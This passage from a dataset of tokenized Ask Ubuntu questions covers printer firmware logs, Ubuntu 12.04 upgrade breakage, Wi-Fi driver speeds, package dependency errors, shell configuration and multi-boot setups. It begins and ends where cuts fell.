dmitriy-desktop udev-configure-printer : add /devices/pci0000:00/0000:00:1d.7/usb2/2-2/2-2:1.0/usb/lp0 may 5 00:45:43 dmitriy-desktop kernel : [ 14956.991611 ] usblp0 : removed may 5 00:45:43 dmitriy-desktop kernel : [ 14957.002692 ] usblp0 : usb bidirectional printer dev 6 if 0 alt 0 proto 2 vid 0x03f0 pid 0x3f17 may 5 00:45:44 dmitriy-desktop udev-configure-printer : uri contains usb serial number may 5 00:45:44 dmitriy-desktop udev-configure-printer : uri match : usb : //hp/laserjet % 20p1505 ? serial=ca4118w may 5 00:45:44 dmitriy-desktop udev-configure-printer : sern field matches usb serial number may 5 00:45:44 dmitriy-desktop udev-configure-printer : uri match : hp : /usb/hp_laserjet_p1505 ? serial=ca4118w may 5 00:45:44 dmitriy-desktop udev-configure-printer : uri of print queue : hp : /usb/hp_laserjet_p1505 ? serial=ca4118w , normalized : laserjet p1505 serial ca4118w may 5 00:45:44 dmitriy-desktop udev-configure-printer : uri of detected printer : usb : //hp/laserjet % 20p1505 ? serial=ca4118w , normalized : laserjet p1505 serial ca4118w may 5 00:45:44 dmitriy-desktop udev-configure-printer : queue ipp : //localhost:631/printers/hp-laserjet-p1505 has matching device uri may 5 00:45:44 dmitriy-desktop udev-configure-printer : device devpath is /devices/pci0000:00/0000:00:1d.7/usb2/2-2 may 5 00:45:44 dmitriy-desktop udev-configure-printer : device already handled may 5 00:45:44 dmitriy-desktop udev-configure-printer : ipp-resume-printer request failed may 5 00:45:44 dmitriy-desktop udev-configure-printer : uri of detected printer : hp : /usb/hp_laserjet_p1505 ? serial=ca4118w , normalized : laserjet p1505 serial ca4118w may 5 00:45:44 dmitriy-desktop udev-configure-printer : queue ipp : //localhost:631/printers/hp-laserjet-p1505 has matching device uri may 5 00:45:44 dmitriy-desktop udev-configure-printer : ipp-resume-printer request failed may 5 00:45:45 dmitriy-desktop /usr/sbin/hpljp1505 : foo2zjs : missing hp laserjet p1505 firmware file /lib/firmware/hp/sihpp1505.dl may 5 00:45:45 dmitriy-desktop /usr/sbin/hpljp1505 : foo2zjs : ... read foo2zjs installation instructions and run ./getweb p1505 may 5 00:45:45 dmitriy-desktop /usr/sbin/hpljp1505 : foo2zjs : missing hp laserjet p1505 firmware file /lib/firmware/hp/sihpp1505.dl may 5 00:45:45 dmitriy-desktop /usr/sbin/hpljp1505 : foo2zjs : ... read foo2zjs installation instructions and run ./getweb p1505 may 5 00:45:45 dmitriy-desktop udev-configure-printer : add /devices/pci0000:00/0000:00:1d.7/usb2/2-2/2-2:1.0/usb/lp0 may 5 00:45:45 dmitriy-desktop udev-configure-printer : device devpath is /devices/pci0000:00/0000:00:1d.7/usb2/2-2 may 5 00:45:45 dmitriy-desktop udev-configure-printer : device already handled may 5 00:45:48 dmitriy-desktop /usr/sbin/hpljp1505 : foo2zjs : missing hp laserjet p1505 firmware file /lib/firmware/hp/sihpp1505.dl may 5 00:45:48 dmitriy-desktop /usr/sbin/hpljp1505 : foo2zjs : ... read foo2zjs installation instructions and run ./getweb p1505 may 5 00:45:48 dmitriy-desktop /usr/sbin/hpljp1505 : foo2zjs : missing hp laserjet p1505 firmware file /lib/firmware/hp/sihpp1505.dl may 5 00:45:48 dmitriy-desktop /usr/sbin/hpljp1505 : foo2zjs : ... read foo2zjs installation instructions and run ./getweb p1505 may 5 00:51:54 dmitriy-desktop foo2xqx-wrapper : foo2xqx-wrapper -r1200x600 -p9 -t3 -m1 -s7 -d1 -n1 may 5 00:51:56 dmitriy-desktop foo2xqx-wrapper : gs -spapersize=a4 -g9920x7016 -r1200x600 -sdevice=pbmraw -dcolorscreen -dmaxbitmap=500000000 may 5 00:51:56 dmitriy-desktop foo2xqx-wrapper : foo2xqx -r1200x600 -g9920x7016 -p9 -m1 -n1 -d1 -s7 -u 176x84 -l 176x84 -t3 may 5 00:51:56 dmitriy-desktop kernel : [ 15329.392969 ] usblp0 : removed i wanted to install hplip from hplipopensource.com , but got answer that ubuntu 12.04 already has the last hplip drivers for my model . another interesting thing is that before upgrade and in windows 7 tonner light and ready light were on , but in 12.04 only ready light is on . any ideas how to make my printer prints in 12.04 ?
131765	old files after upgrading to ubuntu 12.04 lts	i upgrade from ubuntu 11.10 to ubuntu 12.04 lts using iso image , and after finishing upgrading i found out that /var/www folder was deleted . i know i was stupid to believe that it was upgrade and all my software and file will be there , i should 've take a backup before upgrading . is there any chance that i can have my projects back ? is there a special folder where ubuntu stores old files something similar to windows . old as applied to windows ( sorry for mentioning windows here : -p )
131766	could n't find software sources and uninstalled and got message about future updates 12.04	software sources was n't showing up in the unity menu when i searched for it but it said it was installed in the software center . i uninstalled it and got the message : if you uninstall software sources , future updates will not include new items in the ubuntu desktop system set . are you sure you want to continue ? install packages using the apt protocol apturl the ubuntu desktop system ubuntu-desktop i reinstalled it and still couldint find it . i found the answer here software sources not found in unity dash search so now i have it back , but im afraid that since i initially uninstalled it that i 'm going to not get the `` future updates '' even thought i reinstalled it .
131768	d'link wireless dwa-140 speeds are crippled on 12.04	i am running ubuntu 12.04 64bit dualbooting windows 7 . my issue is with my d'link dwa 140 rangebooster n adapter . apparently it uses the ralink chip . lsmod | grep ^rt gives : rt2800usb 22684 0 rt2800lib 58925 1 rt2800usb rt2x00usb 20762 1 rt2800usb rt2x00lib 55301 3 rt2800usb , rt2800lib , rt2x00usb my proper speeds should be actual download speeds of 2.0 mb/s ( isp provides me with a 20mbps connection ) . with this driver in ubuntu , i barely get speeds of 50 kb/s . even then , it will momentarily disconnect at an estimated interval of 5 to 10 seconds everytime . i have tried this guide to install the ralink driver : http : //carlivar.tumblr.com/post/10230485625/fixing-rt2870-usb-wireless-in-ubuntu-or-debian the problem with that guide was , with my first install of ubuntu 12.04 i lost all internet connectivity . i am now on my second install of ubuntu 12.04 . i then tried this guide instead , i did every step : http : //www.cyberciti.biz/tips/linux-install-rt2870-chipset-based-usb-wireless-adapter.html i managed to get through the whole thing without a problem , however upon doing : lsmod | grep -i rt2870 it returned blank . i had no internet connectivity and it did not recognize my d'link adapter . i have internet connection now because i removed the previous blacklist of those modules , disconnected and then reconnected the adapter to get it using the old driver . a strange thing that confuses me is that , ubuntu uses rt2800 while others recommend using rt2870 yet when i do this : lsusb i get this ( truncated to show only relevant information ) : bus 001 device 009 : id 07d1:3c0a d-link system dwa-140 rangebooster n adapter ( rev.b2 ) [ ralink rt3072 ] as you can see , it clearly says rt3072 . i seriously have no clue what ubuntu is or is not using in the background . i assume lsmod is telling me the truth . how can i fix this problem with my internet connection ? its almost unusable . i wait for more than half an hour for it just to check if there are updates because the connection gets stuck in a state of temporary disconnection . it does n't help that it can not reach higher speeds than 50kb/s , and even thats rare . this is not an issue with my adapter , as in windows it works to its full potential . i have been having issues with this ralink driver since 11.04 . it 's become so bad in 12.04 that i am pleading for help here . addendum i have now also tried setting my wireless connection via edit connections . under the wireless tab , i edit my wireless and set ipv6 settings to ignore instead of automatic as i have read elsewhere this also helps . in my case , this does not help . i have also set my wireless power management off via : sudo iwconfig wlan0 power off this does switch off power management , but even this step does not help my connection from constantly speeding up one moment and dropping the next . i am getting really frustrated . i hope someone can guide me , or at least give me a tip that helped them previously regardless of hardware differences .
131769	ubuntu 12.04 cant install dual boot on raid0 , installer cant detect windows7	i just downloaded the .iso and launched it on a live usb . im actually writing this from the live session . i want to install ubuntu 12.04 along with my windows 7 . i have my system set up with 2x1tb raid0 . when im trying to install the only options i have are to erase the whole disk to make a clean install or to go into the advanced partion thing ... it says it cant detect any other os though i have a legit version of windows 7 installed ! please i have searched so much and cant anything ... i really want this to work ... what can be wrong ? thanks in advance ... i also tried sudo dmraid -tay but it said it couldnt detect any raid disk . but i know it should work cause my windows 7 works fine .
131772	~/.bashrc changes have no effect ?	i have been trying to set some custom colors on the user @ hostname : ~ $ on the terminal . i edited both ~/.bashrc and /etc/bash.bashrc where it said : debian_chroot : + ( $ debian_chroot ... i just changed it to : debian_chroot : : : : : : : + ( $ debian_chroot to see if the changes had any effect , but it rebooted and the terminal still looks like the default . what am i doing wrong ? i am using ubuntu 12.04
131775	ca n't add repos after upgrading to 12.04 lts	i 'm a complete linux newbie . i 've just upgraded from 10.04 to 12.04 lts and all sorts of things have started to go wrong . one main problem is the fact that i ca n't add repos . example : sudo add-apt-repository ppa : team-xbmc outputs : traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 8 , in < module > from softwareproperties.softwareproperties import softwareproperties file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 53 , in < module > from ppa import addppasigningkeythread , expand_ppa_line file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 27 , in < module > import pycurl importerror : librtmp.so.0 : can not open shared object file : no such file or directory /etc/apt/sources.list # deb cdrom : [ ubuntu 10.04.1 lts _lucid lynx_ - release i386 ( 20100816.1 ) ] / lucid main restricted # deb cdrom : [ ubuntu 10.04.1 lts _lucid lynx_ - release i386 ( 20100816.1 ) ] / maverick main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu precise main restricted deb-src http : //archive.ubuntu.com/ubuntu precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu precise-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise universe deb-src http : //archive.ubuntu.com/ubuntu precise universe deb http : //archive.ubuntu.com/ubuntu precise-updates universe deb-src http : //archive.ubuntu.com/ubuntu precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu precise multiverse deb-src http : //archive.ubuntu.com/ubuntu precise multiverse deb http : //archive.ubuntu.com/ubuntu precise-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb-src http : //pt.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu lucid partner # deb-src http : //archive.canonical.com/ubuntu lucid partner deb http : //archive.ubuntu.com/ubuntu precise-security main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-security main restricted deb http : //archive.ubuntu.com/ubuntu precise-security universe deb-src http : //archive.ubuntu.com/ubuntu precise-security universe deb http : //archive.ubuntu.com/ubuntu precise-security multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-security multiverse # deb http : //ppa.launchpad.net/stebbins/handbrake-snapshots/ubuntu precise main # disabled on upgrade to precise i have no clue what do do next . should i just scrap this installation and start from scratch or is this fixable ? librtmp.so.0 also shows up in error logs i 've started to get from xbmc ( i 'm not sure if this is relevant info ) . thanks in advance for any help you can give me !
131777	how do i open/extract .xdi file on ( x ) ubuntu ?	downloaded a bunch of books which were compressed in a .xdi file . how do i open/extract the internal data/files ? i go to open , and ubuntu does not recognize/nor is there a seemingly effective application..
131782	gnu smalltalk package	i 've installed the gnu smalltalk package and can get to the smalltalk command line with the command 'gst ' . however , i ca n't start the visual gst browser using the command : $ gst-browser when i try , this is what i get : peter @ peredur : ~ $ gst-browser object : cfunctiondescriptor new : 1 `` < 0x40488720 > '' error : invalid c call-out gdk_colormap_get_type systemexceptions.cinterfaceerror ( smalltalk.exception ) > > signal ( exchandling.st:254 ) systemexceptions.cinterfaceerror class ( smalltalk.exception class ) > > signal : ( exchandling.st:161 ) smalltalk.cfunctiondescriptor ( smalltalk.ccallable ) > > callinto : ( ccallable.st:165 ) gdkcolormap class > > gettype ( gtk.star # vfs.zipfile/funcs.st:1 ) optimized [ ] in glib class > > registeralltypes ( gtk.star # vfs.zipfile/gtkdecl.st:78 ) smalltalk.orderedcollection > > do : ( ordercoll.st:68 ) glib class > > registeralltypes ( gtk.star # vfs.zipfile/gtkdecl.st:78 ) smalltalk.undefinedobject > > executestatements ( gtk.star # vfs.zipfile/gtkimpl.st:1078 ) object : cfunctiondescriptor new : 1 `` < 0x404a7c28 > '' error : invalid c call-out gtk_window_new systemexceptions.cinterfaceerror ( exception ) > > signal ( exchandling.st:254 ) systemexceptions.cinterfaceerror class ( exception class ) > > signal : ( exchandling.st:161 ) cfunctiondescriptor ( ccallable ) > > callinto : ( ccallable.st:165 ) gtk.gtkwindow class > > new : ( gtk.star # vfs.zipfile/funcs.st:1 ) visualgst.gtkdebugger ( visualgst.gtkmainwindow ) > > initialize ( visualgst.star # vfs.zipfile/gtkmainwindow.st:131 ) visualgst.gtkdebugger class ( visualgst.gtkmainwindow class ) > > opensized : ( visualgst.star # vfs.zipfile/gtkmainwindow.st:19 ) [ ] in visualgst.gtkdebugger class > > open : ( visualgst.star # vfs.zipfile/debugger/gtkdebugger.st:16 ) [ ] in blockclosure > > forkdebugger ( debugtools.star # vfs.zipfile/debugtools.st:380 ) [ ] in process > > onblock : at : suspend : ( process.st:392 ) blockclosure > > on : do : ( blkclosure.st:193 ) [ ] in process > > onblock : at : suspend : ( process.st:393 ) blockclosure > > ensure : ( blkclosure.st:269 ) [ ] in process > > onblock : at : suspend : ( process.st:370 ) [ ] in blockclosure > > ascontext : ( blkclosure.st:179 ) blockcontext class > > fromclosure : parent : ( blkcontext.st:68 ) everything hangs at this point until i hit ^c , after which , i get : object : cfunctiondescriptor new : 1 `` < 0x404a7c28 > '' error : invalid c call-out gtk_window_new systemexceptions.cinterfaceerror ( exception ) > > signal ( exchandling.st:254 ) systemexceptions.cinterfaceerror class ( exception class ) > > signal : ( exchandling.st:161 ) cfunctiondescriptor ( ccallable ) > > callinto : ( ccallable.st:165 ) gtk.gtkwindow class > > new : ( gtk.star # vfs.zipfile/funcs.st:1 ) visualgst.gtkdebugger ( visualgst.gtkmainwindow ) > > initialize ( visualgst.star # vfs.zipfile/gtkmainwindow.st:131 ) visualgst.gtkdebugger class ( visualgst.gtkmainwindow class ) > > opensized : ( visualgst.star # vfs.zipfile/gtkmainwindow.st:19 ) [ ] in visualgst.gtkdebugger class > > open : ( visualgst.star # vfs.zipfile/debugger/gtkdebugger.st:16 ) [ ] in blockclosure > > forkdebugger ( debugtools.star # vfs.zipfile/debugtools.st:380 ) [ ] in process > > onblock : at : suspend : ( process.st:392 ) blockclosure > > on : do : ( blkclosure.st:193 ) [ ] in process > > onblock : at : suspend : ( process.st:393 ) blockclosure > > ensure : ( blkclosure.st:269 ) [ ] in process > > onblock : at : suspend : ( process.st:370 ) [ ] in blockclosure > > ascontext : ( blkclosure.st:179 ) blockcontext class > > fromclosure : parent : ( blkcontext.st:68 ) peter @ peredur : ~ $ is there a problem with this package ?
131791	qt 4 packages create dependency problems	i am using ubuntu 12.04 . i recently performed an upgrade for my system . now , when i try to install a package ( aptitude for example ) , i see this : reading package lists ... done building dependency tree reading state information ... done aptitude is already the newest version . aptitude set to manually installed . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libqt4-dbus : depends : libqt4-xml ( = 4:4.8.1-0ubuntu4 ) but 4:4.8.1-0ubuntu4.1 is to be installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4 ) but 4:4.8.1-0ubuntu4.1 is to be installed recommends : qdbus ( = 4:4.8.1-0ubuntu4 ) breaks : libqt4-dbus : i386 ( ! = 4:4.8.1-0ubuntu4 ) but 4:4.8.1-0ubuntu4.1 is to be installed libqt4-dbus : i386 : breaks : libqt4-dbus ( ! = 4:4.8.1-0ubuntu4.1 ) but 4:4.8.1-0ubuntu4 is to be installed libqt4-network : depends : libqt4-dbus ( = 4:4.8.1-0ubuntu4.1 ) but 4:4.8.1-0ubuntu4 is to be installed libqt4-script : depends : libqt4-dbus ( = 4:4.8.1-0ubuntu4.1 ) but 4:4.8.1-0ubuntu4 is to be installed qdbus : depends : libqt4-dbus ( = 4:4.8.1-0ubuntu4.1 ) but 4:4.8.1-0ubuntu4 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i then proceeded to run sudo apt-get install -f to fix the dependency problem . when i ran that , i received this : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libqt4-dbus the following packages will be upgraded : libqt4-dbus 1 upgraded , 0 newly installed , 0 to remove and 30 not upgraded . 23 not fully installed or removed . need to get 0 b/179 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error processing libqt4-dbus ( -- configure ) : libqt4-dbus : amd64 4:4.8.1-0ubuntu4 can not be configured because libqt4-dbus : i386 is in a different version ( 4:4.8.1-0ubuntu4.1 ) dpkg : dependency problems prevent configuration of qdbus : qdbus depends on libqt4-dbus ( = 4:4.8.1-0ubuntu4.1 ) ; however : version of libqt4-dbus on system is 4:4.8.1-0ubuntu4 . dpkg : error processing qdbus ( -- configure ) : dependency problems - leaving unconfigured dpkg : error processing libqt4-dbus : i386 ( -- configure ) : libqt4-dbus : i386 4:4.8.1-0ubuntu4.1 can not be configured because libqt4-dbus : amd64 is in a different version ( 4:4.8.1-0ubuntu4 ) dpkg : dependency problems prevent configuration of libqt4-network : i386 : libqt4-network : i386 depends on libqt4-dbus ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-dbus : i386 is not configured yet . dpkg : error processing libqt4-network : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-network : libqt4-network depends on libqt4-dbus ( = 4:4.8.1-0ubuntu4.1 ) ; however : version of libqt4-dbus on system is 4:4.8.1-0ubuntu4 . dpkg : error processing libqt4-network ( -- configure ) : dependencno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already y problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-script : i386 : libqt4-script : i386 depends on libqt4-dbus ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-dbus : i386 is not configured yet . dpkg : error processing libqt4-script : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-script : libqt4-script depends on libqt4-dbus ( = 4:4.8.1-0ubuntu4.1 ) ; however : version of libqt4-dbus on system is 4:4.8.1-0ubuntu4 . dpkg : error processing libqt4-script ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-xmlpatterns : i386 : libqt4-xmlpatterns : i386 depends on libqt4-network ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-network : i386 is not configured yet . dpkg : error processing libqt4-xmlpatterns : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-xmlpatternno apport report written because maxreports is reached already no apport report written because maxreports is reached already s : libqt4-xmlpatterns depends on libqt4-network ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-network is not configured yet . dpkg : error processing libqt4-xmlpatterns ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-declarative : i386 : libqt4-declarative : i386 depends on libqt4-network ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-network : i386 is not configured yet . libqt4-declarative : i386 depends on libqt4-script ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-script : i386 is not configured yet . libqt4-declarative : i386 depends on libqt4-xmlpatterns ( = 4:4.8.1-0ubun tu4.1 ) ; however : package libqt4-xmlpatterns : i386 is not configured yet . dpkg : error processing libqt4-declarative : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-declarative : libqt4-declarative depends on libqt4-network ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-network is no apport report written because maxreports is reached already not configured yet . libqt4-declarative depends on libqt4-script ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-script is not configured yet . libqt4-declarative depends on libqt4-xmlpatterns ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-xmlpatterns is not configured yet . dpkg : error processing libqt4-declarative ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-designer : libqt4-designer depends on libqt4-script ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-script is not configured yet . dpkg : error processing libqt4-designer ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-designer : i386 : libqt4-designer : i386 depends on libqt4-script ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-script : i386 is not configured yet . dpkg : error processing libqt4-designer : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-help : libqt4-help depends on libqt4-network ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-network is not configured yet . dpkg : error processing libqt4-help ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-qt3support : i386 : libqt4-qt3support : i386 depends on libqt4-designer ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-designer : i386 is not configured yet . libqt4-qt3support : i386 depends on libqt4-network ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-network : i386 is not configured yet . dpkg : error processing libqt4-qt3support : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-scripttools : libqt4-scripttools depends on libqt4-script ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-script is not configured yet . dpkg : error processing libqt4-scripttools ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-scripttools : i386 : libqt4-scripttools : i386 depends on libqt4-script ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-script : i386 is not configured yet . dpkg : error processing libqt4-scripttools : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqtgui4 : i386 : libqtgui4 : i386 depends on libqt4-declarative ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-declarative : i386 is not configured yet . dpkg : error processing libqtgui4 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqtgui4 : libqtgui4 depends on libqt4-declarative ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-declarative is not configured yet . dpkg : error processing libqtgui4 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-opengl : no apport report written because maxreports is reached already libqt4-opengl depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-opengl ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-opengl : i386 : no apport report written because maxreports is reached already libqt4-opengl : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-opengl : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-svg : libqt4-svg depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-svg ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-svg : i386 : no apport report written because maxreports is reached already libqt4-svg : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-svg : i386 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libqt4-dbus qdbus libqt4-dbus : i386 libqt4-network : i386 libqt4-network libqt4-script : i386 libqt4-script libqt4-xmlpatterns : i386 libqt4-xmlpatterns libqt4-declarative : i386 libqt4-declarative libqt4-designer libqt4-designer : i386 libqt4-help libqt4-qt3support : i386 libqt4-scripttools libqt4-scripttools : i386 libqtgui4 : i386 libqtgui4 libqt4-opengl libqt4-opengl : i386 libqt4-svg libqt4-svg : i386 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) running sudo dpkg -- configure -a produces very similar results . does anyone know how i can resolve these errors ? i am currently unable to install any packages .
131792	blank screen after logging in with password	i completed an upgrade from ubuntu 11.04 to 14.04 lts . after the upgrade finished it seems like everything was working . then i turned the computer off over night and the next day the machine powers up , i get the logon screen and i put in my password , and then i get a blank screen . i am running on a dell inspiron 531 , using the 64 bit ubuntu . is there any way to get around this ? i do have the nvidia driver installed . i also noticed that on the blue screen during booting that it showed kubuntu 11.10 , but then the login screen noted ubuntu 12.04 lts . when it rebooted after the update i did notice two program failures : 1. compiz closed unexpectedly , 2 . italc also closed unexpectedly .
131797	route all traffic through ssh tunnel or equivalent ?	i just got a new laptop and put ubuntu on it as a good way to force myself to learn linux . this laptop will be going with me to school , work , the local coffee shop , etc . so i wanted a secure way to browse without pesky filters and worrying about the open wifi . i setup a simple autossh script to run in cron on startup , but i want to route all my traffic , not just web traffic pointed to the local loop back . that way i do n't need to worry about my chats etc . i 've seen some other posts like this , but they had different requirements to meet , none of which i am limited by ; so i 'm curious if there is a better option then ssh ( which seems to have quiet a bit of overhead ) . so the question , what is the best option for tunneling all traffic ( securely of course ) from an ubuntu desktop to an ubuntu server ? one preferably with an example ; )
131808	can i create a bootable external hd from an existing ubuntu installation ?	i know how to do a fresh installation on an external ( usb ) hdd and make it bootable but i 'd like to avoid configuring it and installing all the apps and tweaks . can i just make the drive bootable and the copy all the contents of the partition to it ? should i clone my internal partition somehow ? my actual install takes less than 32gb . i 'm planning on a 100gb partition on the external drive . is it feasible ? i would be extremely grateful for a work path and caveats . btw , the drive is an `` oldie '' maxtor one touch 320gb .
131809	how to install gimp 2.8 in ubuntu 10.10 ?	i have seen repositories for ubuntu 11.x and 12 but not for ubuntu 10.10 ... . how can i install gimp 2.8 on my ubuntu 10.10 maverick ? i do n't want to compile anything ... .
131812	logitech usb headset not working on 12.04	i 've looked around for answers to this question , but none of them seem to work for my particular problem . obviously my usb headset is n't working , but i might as well share the scenario . i am running ubuntu 12.04 and i have a logitech usb headset . the relevant output from dmesg is as follows : [ 160708.528047 ] usb 2-1.2 : usb disconnect , device number 9 [ 160768.890123 ] usb 2-1.2 : new full-speed usb device number 10 using ehci_hcd [ 160768.997578 ] input : logitech logitech usb headset as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.3/input/input15 [ 160768.997795 ] generic-usb 0003:046d:0a0c.0005 : input , hidraw0 : usb hid v1.00 device [ logitech logitech usb headset ] on usb-0000:00:1d.0-1.2/input3 when i go to system settings - > sound , my headset shows up in both the output and input tabs , it is called `` clear chat comfort usb headset '' in those tabs , but i doubt that 's a serious issue . when i click my headset in either tab to use it , the changes are not remembered when i reopen the sound settings , the built-in audio is still used . also when i select the headset in the output tab , and click the test sound button to test everything , the sound still comes from my laptop 's onboard audio , instead of from my usb headset . does anyone know how to correct this ? i am stumped .
131816	is there a way i can record when the stderr is printed to a log file ?	i 'm running the command php somefile.php 1 > > stdout.txt 2 > > stderr.txt is there a way i can record when the stderr is printed ?
131817	weather indicator wrong almanac data	okay this is no big deal but weather indicator 11.11.28 'cloudy 9 ' running on ubuntu 12.04 has the wrong almanac data . the sunrise/sunset times are out by about an hour 5:47/7:06 vs the actual 6:47 am/8:05 pm @ lat : 27.8째 n/97.4째 w. does anyone know where this data comes from ?
131819	how to install javafx ?	i 'm very new to ubuntu world . i downloaded the javafx from here . i got a zip file . i do n't know how do i setup a classpath for it . can anyone help me with this regard ?
131821	ubuntu 11.10 then 12.04 then 60+ updates then boot only shows grub	i had 11.10 x64 installed on amd 4core with nvidia card . i had problems changing screen resolution . i have just over-installed 12.04 x64 . it went well . screen resolution changes worked well . i ran diskutil ( ? ) which said drive was good but grumbled about misaligned partitions of 1k & 3k . i then applies 60+ updates . it said it needed to restart . i press 'restart ' screen button but it would n't restart . i pressed the h/w reset . it came up with gnu grub version 1.99 , 3 lines help text and a grub prompt . i pressed h/w reset . same grub prompt again . how do i get the ubuntu desktop back ? thanks .
131822	how to add ubuntu one icon as an indicator ?	i have precise . i do n't like that ubuntu one 's icon is located in the notifications area under the envelope . i would like the cloud icon back on the panel like it used to be . is there a way to do this ? i have searched and it seems no one has asked this question .
131823	ca n't make zsh the default shell	i am trying to set zsh as my default shell , however it keeps reverting back to bash . i have tried this code : sudo chsh -s $ ( which zsh ) i 've also tried : sudo chsh -s /bin/zsh also tried these commands without sudo . any ideas on what else i need to do . when running zsh from within bash it loads up and works fine but i 'd like to set it as the default shell .
131825	triple boot win 7 , ubuntu 12.04 , fedora 16	i have an hp with a 160gb ssd primary drive and a 500 gb secondary drive . i shrank the 500 gb partition to create space to install ubuntu 12.04 and fedora 16 . i started by following this tutorial how-to-triple-boot-fedora-15-ubuntu-11-04-and-windows-7 the only noticeable difference that i found was that i had to create the boot entry for fedora as grub 2 . after installing fedora and adding the entry to the windows boot loader fedora launched fine . i then installed ubuntu 12.04 and instructed the installer to place grub in the /boot partition that i made for ubuntu . after the install completed i made another windows boot entry for ubuntu . now when i try to launch fedora i am brought to the ubuntu grub loader and i ca n't figure out how to get grub to detect the fedora installation . do i only need one /boot partition since both distros use grub2 ? or because i used lvm per the tutorial grub2 ca n't detect the other distro ? i 'm basically a linux noob but i do have a little experience with ubuntu . output from fdisk -l disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 